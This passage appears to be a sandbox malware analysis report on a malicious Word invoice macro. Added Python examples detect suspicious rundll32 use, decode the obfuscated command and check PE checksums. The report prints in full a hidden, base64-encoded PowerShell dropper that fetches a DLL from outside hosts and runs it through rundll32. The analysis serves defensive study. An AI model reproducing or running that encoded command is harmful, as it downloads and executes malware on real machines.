Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',ItLugJX
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',IJPmPuzefT
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',PUIhDyBaYh
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',MWkJrCwEVqm
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',ItLugJX
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',IJPmPuzefT
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',PUIhDyBaYh
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',MWkJrCwEVqm
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',#1
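The rundll32.exe chain above is what the "Suspicious Call by Ordinal" Sigma hit in the signature list refers to: the DLL is first loaded from the user profile with a named entry point, re-invoked by ordinal (#1) instead of by name, and finally re-launched from a freshly created SysWOW64 subdirectory under a random file name with a non-.dll extension. The following Python is an added example, not part of this report or of Joe Sandbox. It parses the three command-line shapes seen here (quoted or unquoted module, comma- or space-separated entry point) and flags those three traits. The four sample lines are copied verbatim from the process-creation entries; the shell32.dll line is a constructed benign baseline. The user-writable path markers and the accepted extension set are the example's own assumptions.

```python
import re

# rundll32 invocations copied verbatim from the report's process-creation entries,
# plus one constructed benign line (shell32.dll) as a baseline.
SAMPLE_CMDLINES = [
    r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1",
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl",  # constructed, benign
]

RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?['\"]?\s+(?P<rest>.+)$", re.I)
ORDINAL_RE = re.compile(r"^#\d+$")
# Extensions a module loaded through rundll32 legitimately carries (assumed allow-list).
EXPECTED_EXTENSIONS = {"dll", "cpl", "ocx"}
# Locations an unprivileged user can write to (assumed list; extend for your estate).
USER_WRITABLE_MARKERS = ("c:\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


def parse_rundll32(cmdline):
    """Return (module, entry) from a rundll32 command line, or None if it is not one.
    rundll32 accepts both 'dll,entry' and 'dll entry', and the module may be quoted."""
    m = RUNDLL_RE.search(cmdline)
    if not m:
        return None
    rest = m.group("rest").strip()
    if not rest:
        return None
    if rest[0] in "'\"":
        close = rest.find(rest[0], 1)
        module, tail = rest[1:close], rest[close + 1:]
    else:
        mm = re.match(r"([^\s,]+)(.*)", rest)
        module, tail = mm.group(1), mm.group(2)
    tail = tail.lstrip(" ,")
    entry = tail.split()[0] if tail else ""
    return module, entry


def rundll32_signals(cmdline):
    """Set of suspicious traits; empty for lines that look like ordinary rundll32 use."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return set()
    module, entry = parsed
    lower = module.lower()
    filename = lower.rsplit("\\", 1)[-1]
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    signals = set()
    if ORDINAL_RE.match(entry):
        signals.add("ordinal_export")            # the Sigma "call by ordinal" case
    if any(marker in lower for marker in USER_WRITABLE_MARKERS):
        signals.add("module_in_user_writable_path")
    if ext not in EXPECTED_EXTENSIONS:
        signals.add("non_dll_extension")         # e.g. vecwkqdb.lyo under SysWOW64
    return signals


def flagged(cmdlines):
    """(cmdline, signals) for every line that trips at least one signal."""
    out = []
    for line in cmdlines:
        sig = rundll32_signals(line)
        if sig:
            out.append((line, sig))
    return out


if __name__ == "__main__":
    for line, sig in flagged(SAMPLE_CMDLINES):
        print(", ".join(sorted(sig)), "<-", line)
```

Each of the four report lines trips at least one signal while the baseline trips none; in a SIEM the same three checks map onto process-creation events (Sysmon event 1 or Windows 4688) where the CommandLine field carries the text parsed here.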
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdbx source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2102635935.000000001B460000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2096087494.0000000002C07000.00000004.00000040.sdmp
Source: Invoice 6682363.doc Initial sample: OLE summary subject = Human Awesome interface XSS Electronics, Kids & Garden Frozen Incredible Metal Chips application hacking Baby & Health Rwanda

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Invoice 6682363.doc Stream path 'Macros/VBA/Dzbky2bhynftefpvl' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Dzbky2bhynftefpvl Name: Dzbky2bhynftefpvl
Document contains an embedded VBA with many randomly named variables
Source: Invoice 6682363.doc Stream path 'Macros/VBA/Dzbky2bhynftefpvl' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: Invoice 6682363.doc Stream path 'Macros/VBA/Dzbky2bhynftefpvl' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Dzbky2bhynftefpvl Name: Dzbky2bhynftefpvl
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBp
ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0
AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoAC Jump to behavior
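The caret-escaped cmd.exe line and the -enc blob it hands to powershell.exe are two layers an analyst has to peel back by hand. What follows is an added example, not part of this report or of Joe Sandbox: a Python decoder that strips the carets (cmd.exe reads ^x as a literal x, which is why the VBA inserts them), locates the -EncodedCommand argument (powershell.exe accepts any prefix of the switch name, so -e, -en and -enc all work), base64-decodes it as UTF-16LE, and then statically resolves the two string-building tricks visible in the decoded code: the -f format operator with shuffled argument order and the 'a'+'b' concatenations wrapped in parentheses. Only the first 248 base64 characters of the report's blob are embedded (the full command line runs to several kilobytes); the $W06G fragment is taken from the powershell.exe console write recorded earlier in the report. The format resolver handles only the bare {n} placeholders seen here, not width or format specifiers.

```python
import base64
import re

# Opening of the caret-obfuscated command line from the report. The base64 argument is
# truncated to the first 248 characters of the blob shown on the page; the rest of the
# text is verbatim.
CMDLINE = (
    "cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en "
    "th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc "
    "cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsA"
    "VAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAA"
    "JwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4A"
    "aQBvAC4AZABpACcAKQApACAAIAA7ACAA"
)

# Fragment of the running script as captured in the powershell.exe console write
# (UTF-16 nulls removed): a parenthesised concatenation chain.
CONSOLE_FRAGMENT = "$W06G=(('Y'+'51')+'U')"


def strip_carets(cmdline):
    """Undo cmd.exe escaping: '^x' reaches the child process as just 'x'."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def extract_encoded(cmdline):
    """Find the -EncodedCommand argument (any prefix of the switch name) and decode it.
    The payload is base64 over UTF-16LE, which is why every second byte is NUL."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        if len(flag) > 1 and flag[0] in "-/" and "encodedcommand".startswith(flag[1:]):
            return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
    raise ValueError("no -EncodedCommand argument found")


# "{0}{2}{1}" -f 'a','b','c'  ->  'acb'   (only bare {n} placeholders are handled)
FORMAT_RE = re.compile(r'"((?:\{\d+\})+)"\s*-f\s*((?:\'[^\']*\'\s*,\s*)*\'[^\']*\')', re.I)


def resolve_format_operator(script):
    def _sub(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        return "'" + m.group(1).format(*args) + "'"
    return FORMAT_RE.sub(_sub, script)


# 'a'+'b' -> 'ab', and ('ab') -> 'ab' unless the paren is a call/cast like [Type]('x')
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
PAREN_RE = re.compile(r"(?<![\w\]])\(\s*('[^']*')\s*\)")


def fold_string_concat(script):
    """Repeat the two rewrites until the text stops changing."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        script = PAREN_RE.sub(r"\1", script)
    return script


def deobfuscate(cmdline):
    plain = strip_carets(cmdline)
    script = extract_encoded(plain)
    return fold_string_concat(resolve_format_operator(script))


if __name__ == "__main__":
    print(strip_carets(CMDLINE)[:120])
    print(deobfuscate(CMDLINE))
    print(fold_string_concat(CONSOLE_FRAGMENT))
```

The first statement comes out as sET-iTem vARIABle:4PuW ([TypE]('SYsTem.io.directory')): the loader stashes the System.IO.Directory type in a variable before it does anything else, consistent with the drop directory C:\Users\user\Ndczqyb\Haf0_yn recorded in the dropped-file entry further down. The console fragment folds to $W06G='Y51U', which is the same technique applied to the junk variables that pad the script.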
PE file contains an invalid checksum
Source: P44G.dll.5.dr Static PE information: real checksum: 0x605d1 should be: 0x561b4
PE file contains sections with non-standard names
Source: P44G.dll.5.dr Static PE information: section name: .text4
Source: P44G.dll.5.dr Static PE information: section name: .text8
Source: P44G.dll.5.dr Static PE information: section name: .text7
Source: P44G.dll.5.dr Static PE information: section name: .text6
Source: P44G.dll.5.dr Static PE information: section name: .text5
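Both static findings on P44G.dll, a CheckSum field that does not match the image and sections named .text4 through .text8, are cheap to reproduce without a sandbox. The following is an added example, not part of this report or of Joe Sandbox. It implements the IMAGE_OPTIONAL_HEADER.CheckSum algorithm used by imagehlp's CheckSumMappedFile (as reimplemented in pefile and ReactOS): a 16-bit carry fold over every 32-bit word of the file, skipping the CheckSum field itself, plus the file length. It also lists section names that fall outside a conventional allow-list. The dropped DLL is not reproduced here, so the test image is a constructed header-only PE32 built by build_sample_pe, and the allow-list of standard section names is the example's own assumption. The 0x605d1 / 0x561b4 values in the report cannot be recomputed without the file itself.

```python
import struct

# Section names a normal toolchain emits; anything else deserves a look.
# Allow-list assumed by this example, not taken from the report.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".pdata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".CRT", ".debug", ".xdata"}


def _pe_offset(data):
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[off:off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    return off


def stored_checksum(data):
    # PE sig (4) + COFF header (20) + 0x40 into the optional header = +0x58
    return struct.unpack_from("<I", data, _pe_offset(data) + 0x58)[0]


def pe_checksum(data):
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum over the whole file."""
    skip = (_pe_offset(data) + 0x58) // 4                 # dword index of the field
    padded = data + b"\0" * (-len(data) % 4)               # trailing bytes are zero-padded
    total = 0
    for i in range(len(padded) // 4):
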